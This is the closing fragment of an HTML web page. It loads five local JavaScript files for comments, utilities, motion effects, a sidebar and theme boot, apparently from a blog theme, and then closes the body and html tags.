<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
